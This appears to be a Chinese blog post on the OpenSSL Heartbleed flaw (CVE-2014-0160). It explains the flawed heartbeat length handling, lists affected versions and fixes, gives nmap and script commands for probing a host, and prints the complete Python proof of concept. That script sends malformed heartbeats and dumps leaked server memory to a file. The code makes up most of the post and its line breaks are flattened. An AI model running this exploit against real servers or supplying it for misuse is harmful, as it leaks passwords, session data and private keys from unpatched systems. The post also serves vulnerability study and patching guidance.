heartbleed漏洞利用

心脏滴血漏洞。
漏洞源于openssl对TLS/DTLS (transport layer security protocols)协议心跳扩展功能的实现. 通过漏洞每次可以泄漏服务器内存64K大小的数据内容，其中可能包含用户名、密码、私钥等敏感数据.

heartbeats的作用

受影响版本：OpenSSL 1.0.1 - 1.0.1f 存在漏洞
heartbeat数据结构体

struct hb {
int type;
int length;
unsigned char *data;
};

type为heartbeat类型，length为data大小，data字段的内容组成分为type字段占1个字节，payload字段占2个字节，其余的为payload的具体内容

Payload内容

0 类型,type
1-2 data中具体的内容的大小,payload
3-len 具体的内容,pl

假如客户端发送的data数据为"007abcdefg"，那么服务器端解析可以得到type=0, payload=07, pl='abcdefg'，申请(1+2+7=10)大小的内存，然后再将type, payload, pl写到新申请的内存中

漏洞代码(OpenSSL 中的 ssl/d1_both.c 文件中dtls1_process_heartbeat 函数)
………….
buffer = OPENSSL_malloc(1 + 2 + payload + padding); //根据 payload 分配内存，额外的3字节用于存放类型和长度
………….
memcpy(bp, pl, payload); //填充回应包的载荷

exploit：

nmap --script=ssl-heartbleed -p 443 www.example.com
python heartbleed-poc.py -p 443 www.example.com

参考更丰富的方案：
1)http://www.freebuf.com/sectool/32785.html
2)http://heartbleed.com/
3)http://www.cnblogs.com/milantgh/p/3728350.html

修复方案：
1）升级到openssl 1.0.1g或更新版本
2）重新编译openssl，在编译时增加参数 -DOPENSSL_NO_HEARTBEATS 关闭心跳扩展功能
3）撤销数字证书，以免证书被窃取后篡改使用Man-In-Middle攻击

heartbleed-poc.py:

#!/usr/bin/python# Quick and dirty demonstration of CVE-2014-0160 originally by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Modified by SensePost based on lots of other people's efforts (hard to work out credit via PasteBin)import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
import smtpliboptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-n', '--num', type='int', default=1, help='Number of heartbeats to send if vulnerable (defines how much memory you get back) (default: 1)')
options.add_option('-f', '--file', type='str', default='dump.bin', help='Filename to write dumped memory too (default: dump.bin)')
options.add_option('-q', '--quiet', default=False, help='Do not display the memory dump', action='store_true')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS (smtp only right now)')def h2bin(x):return x.replace(' ', '').replace('\n', '').decode('hex')hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')hbv10 = h2bin('''
18 03 01 00 03
01 40 00
''')hbv11 = h2bin('''
18 03 02 00 03
01 40 00
''')hbv12 = h2bin('''
18 03 03 00 03
01 40 00
''')def hexdump(s, dumpf, quiet):dump = open(dumpf,'a')dump.write(s)dump.close()if quiet: returnfor b in xrange(0, len(s), 16):lin = [c for c in s[b : b + 16]]hxdat = ' '.join('%02X' % ord(c) for c in lin)pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)print '  %04x: %-48s %s' % (b, hxdat, pdat)printdef recvall(s, length, timeout=5):endtime = time.time() + timeoutrdata = ''remain = lengthwhile remain > 0:rtime = endtime - time.time()if rtime < 0:if not rdata:return Noneelse:return rdatar, w, e = select.select([s], [], [], 5)if s in r:data = s.recv(remain)# EOF?if not data:return Nonerdata += dataremain -= len(data)return rdatadef recvmsg(s):hdr = recvall(s, 5)if hdr is None:print 'Unexpected EOF receiving record header - server closed connection'return None, None, Nonetyp, ver, ln = struct.unpack('>BHH', hdr)pay = recvall(s, ln, 10)if pay is None:print 'Unexpected EOF receiving record payload - server closed connection'return None, None, Noneprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))return typ, ver, paydef hit_hb(s, dumpf, host, quiet):while True:typ, ver, pay = recvmsg(s)if typ is None:print 'No heartbeat response received from '+host+', server likely not vulnerable'return Falseif typ == 24:if not quiet: print 'Received heartbeat response:'hexdump(pay, dumpf, quiet)if len(pay) > 3:print 'WARNING: server '+ host +' returned more data than it should - server is vulnerable!'else:print 'Server '+host+' processed malformed heartbeat, but did not return any extra data.'return Trueif typ == 21:if not quiet: print 'Received alert:'hexdump(pay, dumpf, quiet)print 'Server '+ host +' returned error, likely not vulnerable'return Falsedef connect(host, port, quiet):s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)if not quiet: print 'Connecting...'sys.stdout.flush()s.connect((host, port))return sdef tls(s, quiet):if not quiet: print 'Sending Client Hello...'sys.stdout.flush()s.send(hello)if not quiet: print 'Waiting for Server Hello...'sys.stdout.flush()def parseresp(s):while True:typ, ver, pay = recvmsg(s)if typ == None:print 'Server closed connection without sending Server Hello.'return 0# Look for server hello done message.if typ == 22 and ord(pay[0]) == 0x0E:return verdef check(host, port, dumpf, quiet, starttls):response = Falseif starttls:try:s = smtplib.SMTP(host=host,port=port)s.ehlo()s.starttls()except smtplib.SMTPException:print 'STARTTLS not supported...'s.quit()return Falseprint 'STARTTLS supported...'s.quit()s = connect(host, port, quiet)s.settimeout(1)try:re = s.recv(1024)s.send('ehlo starttlstest\r\n')re = s.recv(1024)s.send('starttls\r\n')re = s.recv(1024)except socket.timeout:print 'Timeout issues, going ahead anyway, but it is probably broken ...'tls(s,quiet)else:s = connect(host, port, quiet)tls(s,quiet)version = parseresp(s)if version == 0:if not quiet: print "Got an error while parsing the response, bailing ..."return Falseelse:version = version - 0x0300if not quiet: print "Server TLS version was 1.%d\n" % versionif not quiet: print 'Sending heartbeat request...'sys.stdout.flush()if (version == 1):s.send(hbv10)response = hit_hb(s,dumpf, host, quiet)if (version == 2):s.send(hbv11)response = hit_hb(s,dumpf, host, quiet)if (version == 3):s.send(hbv12)response = hit_hb(s,dumpf, host, quiet)s.close()return responsedef main():opts, args = options.parse_args()if len(args) < 1:options.print_help()returnprint 'Scanning ' + args[0] + ' on port ' + str(opts.port)for i in xrange(0,opts.num):check(args[0], opts.port, opts.file, opts.quiet, opts.starttls)if __name__ == '__main__':main()

heartbleed漏洞利用相关推荐

Heartbleed漏洞的复现与利用
一. 1.Heartbleed漏洞是什么 Openssl在处理心跳包的时候检测漏洞,没有检测payload与实际的数据字段是否匹配,造成最大64KB的内存泄漏 2.基本背景和影响 OpenS ...
OpenSSL的Heartbleed漏洞原理及简单模拟
Heartbleed漏洞自从Heartbleed漏洞曝光以来,网上能看到很多相关的文章,但大部分都是写的云里雾里,本文尝试直观明了的对漏洞原理进行说明及模拟. OpenSSL是SSL协议以及一系列加 ...
心脏滴血漏洞利用（CVE-2014-0160）
0x00 前置知识心脏滴血漏洞复现(CVE-2014-0160) - 知乎 1.心脏滴血简介心脏出血漏洞"是指openssl这个开源软件中的一个漏洞,因为该软件使用到一个叫做heartb ...
网安大事件丨Fortinet对Apache Log4j漏洞利用的全面复盘与防御
起底Apache Log4j漏洞: 如何出现.如何被利用与如何防御受影响平台: 任何使用Log4j2漏洞版本的应用程序和服务受影响用户: 任何使用Log4j的具备该漏洞版本的组织影响: 远程攻击 ...
关于HeartBleed漏洞的总结
一:前言 Heart Bleed漏洞又称为心脏出血漏洞,编号(CVE-2014-0160),产生原因:由于未能在memcpy()调用受害用户输入的内容作为长度参数之前正确进行边界检查.攻击者可以追踪O ...
CORS漏洞利用检测和利用方式
CORS全称Cross-Origin Resource Sharing, 跨域资源共享,是HTML5的一个新特性,已被所有浏览器支持,不同于古老的jsonp只能get请求. 检测方式: 1.curl访 ...
流行漏洞利用工具包瞄准Flash、Java和IE
Digital Shadows研究了"In the Business of Exploitation"中22个漏洞利用工具包,发现共有76个被瞄准的漏洞.最常被利用的软件应该不会太 ...
Flash Player漏洞利用Exploiting Flash Reliably
以下消息来自幻影论坛[Ph4nt0m]邮件组前两天推荐过Mark Dowd的Paper "Exploiting Flash Reliably" [url]http://hi. ...
溢出漏洞利用小结（基础）
shell 获取小结这里总结几种常见的获取 shell 的方式: 执行 shellcode,这一方面也会有不同的情况可以直接返回 shell 可以将 shell 返回到某一个端口 shellcod ...

heartbleed漏洞利用

heartbleed漏洞利用相关推荐

最新文章

热门文章